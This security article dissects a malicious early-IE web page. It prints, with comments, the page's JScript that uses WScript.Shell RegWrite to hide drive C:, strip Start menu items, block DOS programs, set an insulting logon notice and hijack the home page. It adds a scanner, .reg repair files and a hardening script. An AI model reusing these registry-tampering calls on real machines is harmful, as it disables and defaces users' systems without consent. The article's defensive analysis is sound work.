Can merely browsing a web page modify your registry? It certainly can! If you have visited the page http://www. com/default.htm, you will know the sinking feeling.
Visiting that page does the following:
1. Tampers with the Start menu:
1) removes "Shut Down"
2) removes "Run"
3) removes "Log Off"
2. Hides drive C: you can no longer find your C: drive
3. Disables Registry Editor (regedit)
4. Prohibits running MS-DOS programs
5. Prevents restarting the system in "real mode" (MS-DOS mode)
6. Prohibits running any program
7. Changes the IE home page to http://www. So-and-So com/ and adds that site to the Favorites folder.
So how do these horror features work? It turns out the page is an ordinary HTML file whose script, written in JavaScript (run by Internet Explorer as JScript), creates Windows Script Host ActiveX objects: WScript.Shell, whose RegWrite method writes arbitrary registry values, plus Scripting.FileSystemObject and WScript.Network for the Favorites trick. To help more people understand the danger, I examined its source, list the main parts below, and add detailed comments (the "Note:" lines are my comments).
Note: Before any of the lines below run, the page must obtain the objects it calls Shl, FSO and Net. These three lines were not in the quoted excerpt; they are the standard way a script gets those objects and are included here so the listing is complete:
var Shl = new ActiveXObject("WScript.Shell");              // RegWrite: arbitrary registry writes
var FSO = new ActiveXObject("Scripting.FileSystemObject"); // file and folder access
var Net = new ActiveXObject("WScript.Network");            // UserName of the victim
Note: The following line changes the IE default home page to http://www. So-and-So. com/
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www. So-and-So com/");
Note: The following lines are the trick the page uses to modify the victim's registry: each writes a restriction policy under HKCU\...\Policies. The value argument was lost in the quoted copy; any nonzero value (1 here) switches the restriction on, which is the effect the page has.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 1, "REG_BINARY");
Note: Removes "Run" from the victim's Start menu, so the user cannot launch Registry Editor from it.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 1, "REG_BINARY");
Note: Removes "Shut Down" from the victim's Start menu.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 1, "REG_BINARY");
Note: Removes "Log Off" from the victim's Start menu.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
Note: Hides drive C on the victim's system. NoDrives is a bitmask with one bit per drive letter (bit 0 = A, bit 1 = B, bit 2 = C, ...), so the value 4 hides exactly C:.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", 1, "REG_BINARY");
Note: Prohibits all MS-DOS applications from running.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", 1, "REG_BINARY");
Note: Prevents the system from being restarted in "real mode" (traditional MS-DOS mode).
Also note: When you visit the page, it also modifies the following keys so that a notice window is displayed when Windows starts, before the user logs on (on Windows 9x, before the Microsoft Network logon):
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "Woo la la ...");
Note: This line makes the title of that window "Woo la la ..."
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "Welcome! You are such a super big idiot! \"Woo la la ...\" the story begins, and you are doomed to a miserable world");
Note: This line is the text shown in that window. (On Windows 2000 the logon notice is read from HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon instead, so there this particular trick does nothing.)
Note: The following two lines modify the registry so that every IE window title on the victim's machine ends with "Woo la la ...":
Shl.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Woo la la ...");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Woo la la ...");
Note: With that line, all of the modifications to the victim's registry are complete!
Note: The following code locates the victim's Favorites folder so the page can add itself to it. It is shown inside a function because a bare return is only legal there; the original page wraps it the same way.
function addToFavorites() {
  var WF, loc;
  WF = FSO.GetSpecialFolder(0);                       // 0 = WindowsFolder, e.g. C:\WINDOWS
  loc = WF + "\\Favorites";                           // Windows 9x keeps Favorites under the Windows folder
  if (!FSO.FolderExists(loc)) {
    // Windows 2000 keeps a per-user Favorites folder under Documents and Settings
    loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
    if (!FSO.FolderExists(loc)) {
      return;                                         // give up silently if neither location exists
    }
  }
  // Note: The following call adds the Web page to the victim's favorites. AddFavLnk is the
  // page's own helper that writes the shortcut file; its body is not part of this excerpt.
  AddFavLnk(loc, "find sense www. so-and. com", "http://www. xxx. com");
}
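The pattern above is uniform enough to flag statically: an ActiveXObject call that creates WScript.Shell, followed by RegWrite calls whose target lies under a Policies key. The scanner below is an added example, not code from the original page or its author. It runs under Node.js; SAMPLE is a constructed snippet in the shape of the listing above (example.invalid stands in for the redacted site), and scanScript and its verdict labels are names chosen here.

```javascript
// Added example, not code from the original article: a static scanner for the
// pattern this page relies on, a script that instantiates a Windows Script Host
// object through ActiveXObject and then calls RegWrite against a Policies key.
// SAMPLE is constructed here to mirror the article's listing (example.invalid
// stands in for the redacted site); scanScript and the verdict labels are mine.

var WSH_PROGIDS = {
  "wscript.shell": "registry and command access",
  "scripting.filesystemobject": "file system access",
  "wscript.network": "user and network identity"
};

// COM method names resolve case-insensitively, which is why the article's
// "Shl.regwrite" works, so every pattern here is case-insensitive too.
var ACTIVEX_RE = /new\s+ActiveXObject\s*\(\s*["']([^"']+)["']\s*\)/gi;
var REGWRITE_RE = /\.\s*RegWrite\s*\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*("(?:[^"\\]|\\.)*"|[^,)]+)/gi;
// Restriction policies of the kind the page sets, matched on the unescaped path.
var POLICY_RE = /\\Policies\\(Explorer|System|WinOldApp)\\([A-Za-z]+)$/i;

// Undo the escaping used inside a JScript string literal so the path reads as
// it does in the registry ("HKCU\\Software" in source is HKCU\Software).
function unescapeJsString(s) {
  return s.replace(/\\\\/g, "\\").replace(/\\"/g, '"');
}

function scanScript(source) {
  var progids = [], writes = [], policies = [], m;
  ACTIVEX_RE.lastIndex = 0;
  while ((m = ACTIVEX_RE.exec(source)) !== null) {
    if (WSH_PROGIDS[m[1].toLowerCase()]) progids.push(m[1]);
  }
  REGWRITE_RE.lastIndex = 0;
  while ((m = REGWRITE_RE.exec(source)) !== null) {
    var path = unescapeJsString(m[1]);
    var write = {
      hive: path.split("\\")[0].toUpperCase(),
      path: path,
      value: m[2].replace(/^"|"$/g, "")
    };
    writes.push(write);
    var p = POLICY_RE.exec(path);
    if (p) policies.push(p[1] + "\\" + p[2]);
  }
  // Any registry write from a web page deserves a look; a write under the
  // Explorer/System/WinOldApp policies is the tampering this article describes.
  var verdict = "clean";
  if (writes.length > 0) verdict = "registry-writer";
  if (policies.length > 0) verdict = "policy-tampering";
  return { progids: progids, writes: writes, policies: policies, verdict: verdict };
}

// Constructed sample in the shape of the article's listing.
var SAMPLE = [
  'var Shl = new ActiveXObject("WScript.Shell");',
  'var FSO = new ActiveXObject("Scripting.FileSystemObject");',
  'Shl.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page", "http://example.invalid/");',
  'Shl.regwrite ("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun", 01, "REG_BINARY");',
  'Shl.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDrives", "00000004", "REG_DWORD");',
  'Shl.RegWrite("HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Winlogon\\\\LegalNoticeCaption", "Woo la la ...");'
].join("\n");

if (typeof module !== "undefined" && require.main === module) {
  console.log(JSON.stringify(scanScript(SAMPLE), null, 2));
}
```

Point scanScript at the saved HTML of a suspicious page. It reports every RegWrite as worth a look and every write under Policies\Explorer, System or WinOldApp as the tampering described here. A regex scanner is only a first filter: scripts that assemble the key path by concatenation or hide the call behind eval will slip past it, so read a "clean" verdict as "nothing obvious".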
Since the code is short and annotated, you can now see exactly what is going on. So what if you have already stumbled onto the page and taken the hit? Don't panic; here is how to undo it.
How to repair an affected system:
1. Windows 9x users: press F8 as the computer starts, choose "Command prompt only" to get to MS-DOS, and run scanreg /restore to bring back the most recent automatic registry backup from before you visited the page.
2. Windows 2000 users: copy the contents below into Notepad, save the file as Unlock.reg, boot into "Safe Mode with Command Prompt", import it with regedit /s unlock.reg, and restart. One caveat: if the page has also set DisableRegistryTools (item 3 in the list at the top), regedit.exe refuses to run at all, imports included; clear that value first by a route that does not involve regedit, such as a script calling WScript.Shell.RegWrite, and then import the file.
The contents of the Unlock.reg file are as follows (lines beginning with ; are comments, which regedit ignores; "=-" deletes a value so its default comes back):
Windows Registry Editor Version 5.00

; Start menu and drive restrictions the page switches on
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=-
"NoClose"=-
"NoLogOff"=-
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

; Allow Registry Editor again
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

; Allow MS-DOS programs and real mode again
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000000
"NoRealMode"=dword:00000000

; Clear the logon notice. This is the Windows 9x location the page writes to;
; Windows 2000 reads its notice from ...\Windows NT\CurrentVersion\Winlogon, which the page does not touch.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

; Remove the title-bar suffix so IE shows its default title again
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"=-

; Same for the per-user copy, and reset the home page (change about:blank to whatever you prefer)
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"=-
"Start Page"="about:blank"
Preventive measures:
1. The key to not getting hit is simply not to wander onto sites you know nothing about.
2. In IE's security settings for the Internet zone, disable ActiveX controls and plug-ins, "Initialize and script ActiveX controls not marked as safe", and Active scripting (or at least set them to Prompt). This is the setting that actually stops a page like this one, because the whole attack runs through an ActiveX object created from script.
3. Update your antivirus signature database; current signatures detect this kind of malicious page.
4. Since the page does its damage by modifying the registry, we can "lock" the registry in advance, i.e. forbid use of Registry Editor, as a precaution. But then how do you use Registry Editor Regedit.exe yourself? You prepare a "key" in advance that opens the "lock"! Be clear about what this lock covers, though: DisableRegistryTools only stops regedit.exe from running. It does not block the registry API, and WScript.Shell.RegWrite writes through that API, so this page gets past the lock untouched. Treat the lock as a guard against casual or accidental edits; measure 2 is what protects you from this attack.
The lock method is as follows:
(1) Run Registry Editor Regedit.exe;
(2) Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System, create a new DWORD value named DisableRegistryTools and set it to 1. Registry Editor Regedit.exe can no longer be used.
The unlock method is as follows:
Using Notepad, create a .reg file with any name, such as Unlock.reg, containing:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
Save it and you have your key. When you want to use Registry Editor again, double-click Unlock.reg. Two formatting rules matter: the line after "REGEDIT4" must be blank, and there must be no space between the "T" and the "4" of "REGEDIT4", otherwise the import does nothing. One more caveat: double-clicking a .reg file simply starts regedit.exe to import it, and on Windows 2000 regedit.exe checks DisableRegistryTools at startup and refuses to run while the value is 1. On such a system the key will not turn in the lock; clear the value by a route that does not go through regedit, for example a script calling WScript.Shell.RegWrite, before trying to import anything.
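As an added example (not the article's code), the Windows Script Host script below performs the repair described under "How to repair an affected system", the lock and unlock just described, and the Internet-zone hardening of preventive measure 2, all through WScript.Shell, the same object the malicious page used. It assumes WSH is installed (Windows 98 and 2000 ship it) and that it runs as the affected user, since the policies live under HKCU. The key paths are the ones quoted in this article; the function names, the command modes and the zone-3 URL action numbers 1200/1201/1400 are additions here.

```javascript
// Added example, not code from the original article: a Windows Script Host
// (JScript) repair script that undoes the changes described above through the
// same WScript.Shell interface the malicious page used. RegWrite/RegDelete go
// straight to the registry API and never consult DisableRegistryTools, so this
// still works when regedit.exe refuses to start. The key paths are the ones the
// article quotes; the function names, the repair/lock/unlock/harden modes and
// the Internet-zone hardening (URL actions 1200/1201/1400 set to 3 = disable)
// are this example's additions.
// Usage under WSH:  cscript repair.js [repair|lock|unlock|harden]

var POL = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\";
var WINLOGON = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\";
var IE_MAIN = "Software\\Microsoft\\Internet Explorer\\Main\\";
var ZONE3 = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\";

// Each step is ["write", path, value, type] or ["delete", path]. Window Title is
// deleted rather than blanked: IE appends whatever string is there to every
// title bar, so only removing the value restores the default title.
function repairSteps(homePage) {
  return [
    ["write", POL + "Explorer\\NoRun", 0, "REG_DWORD"],
    ["write", POL + "Explorer\\NoClose", 0, "REG_DWORD"],
    ["write", POL + "Explorer\\NoLogOff", 0, "REG_DWORD"],
    ["write", POL + "Explorer\\NoDrives", 0, "REG_DWORD"],
    ["write", POL + "Explorer\\RestrictRun", 0, "REG_DWORD"],
    ["write", POL + "WinOldApp\\Disabled", 0, "REG_DWORD"],
    ["write", POL + "WinOldApp\\NoRealMode", 0, "REG_DWORD"],
    ["write", WINLOGON + "LegalNoticeCaption", "", "REG_SZ"],
    ["write", WINLOGON + "LegalNoticeText", "", "REG_SZ"],
    ["delete", "HKLM\\" + IE_MAIN + "Window Title"],
    ["delete", "HKCU\\" + IE_MAIN + "Window Title"],
    ["write", "HKCU\\" + IE_MAIN + "Start Page", homePage, "REG_SZ"]
  ];
}

// The article's "lock": 1 stops regedit.exe from starting, 0 allows it again.
function lockSteps(locked) {
  return [["write", POL + "System\\DisableRegistryTools", locked ? 1 : 0, "REG_DWORD"]];
}

// Internet zone (zone 3) URL actions: 1200 run ActiveX controls and plug-ins,
// 1201 initialise and script ActiveX controls not marked safe, 1400 active
// scripting. 0 = enable, 1 = prompt, 3 = disable.
function hardenSteps() {
  return [
    ["write", ZONE3 + "1200", 3, "REG_DWORD"],
    ["write", ZONE3 + "1201", 3, "REG_DWORD"],
    ["write", ZONE3 + "1400", 3, "REG_DWORD"]
  ];
}

function stepsFor(mode, homePage) {
  if (mode === "lock") return lockSteps(true);
  if (mode === "unlock") return lockSteps(false);
  if (mode === "harden") return hardenSteps();
  return repairSteps(homePage);
}

// Apply steps through any object exposing RegWrite/RegDelete: the real
// WScript.Shell, or a recorder for a dry run. HKLM writes need administrative
// rights and are reported in "failed" when denied; a failing delete is treated
// as "value already absent" and simply not counted.
function applySteps(shell, steps) {
  var applied = 0, failed = [];
  for (var i = 0; i < steps.length; i++) {
    var s = steps[i];
    if (s[0] === "write") {
      try { shell.RegWrite(s[1], s[2], s[3]); applied++; }
      catch (e) { failed.push(s[1]); }
    } else {
      try { shell.RegDelete(s[1]); applied++; }
      catch (e) { /* nothing to delete */ }
    }
  }
  return { applied: applied, failed: failed };
}

// Dry-run shell: records calls instead of touching the registry.
function RecorderShell() { this.calls = []; }
RecorderShell.prototype.RegWrite = function (path, value, type) {
  this.calls.push({ op: "write", path: path, value: value, type: type });
};
RecorderShell.prototype.RegDelete = function (path) {
  this.calls.push({ op: "delete", path: path });
};

// Only under Windows Script Host is the real shell available.
if (typeof WScript !== "undefined" && typeof ActiveXObject !== "undefined") {
  var mode = WScript.Arguments.length > 0 ? WScript.Arguments(0) : "repair";
  var outcome = applySteps(new ActiveXObject("WScript.Shell"), stepsFor(mode, "about:blank"));
  WScript.Echo(mode + ": " + outcome.applied + " change(s) applied, " + outcome.failed.length + " denied");
}
```

Run cscript repair.js to undo the page's changes, cscript repair.js lock or unlock to manage the "lock" described above, and cscript repair.js harden to switch off ActiveX and scripting for the Internet zone. Because RegWrite bypasses DisableRegistryTools, unlock works even while regedit.exe refuses to start; the HKLM writes need administrator rights on Windows 2000 and are reported as denied otherwise.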
Note: The damage done by the "Million Flower Valley" malicious web page can likewise be prevented with the measures above, and a system that has already been hit can be recovered with the same steps. KV3000 is also reported to fully repair the system changes described in this article.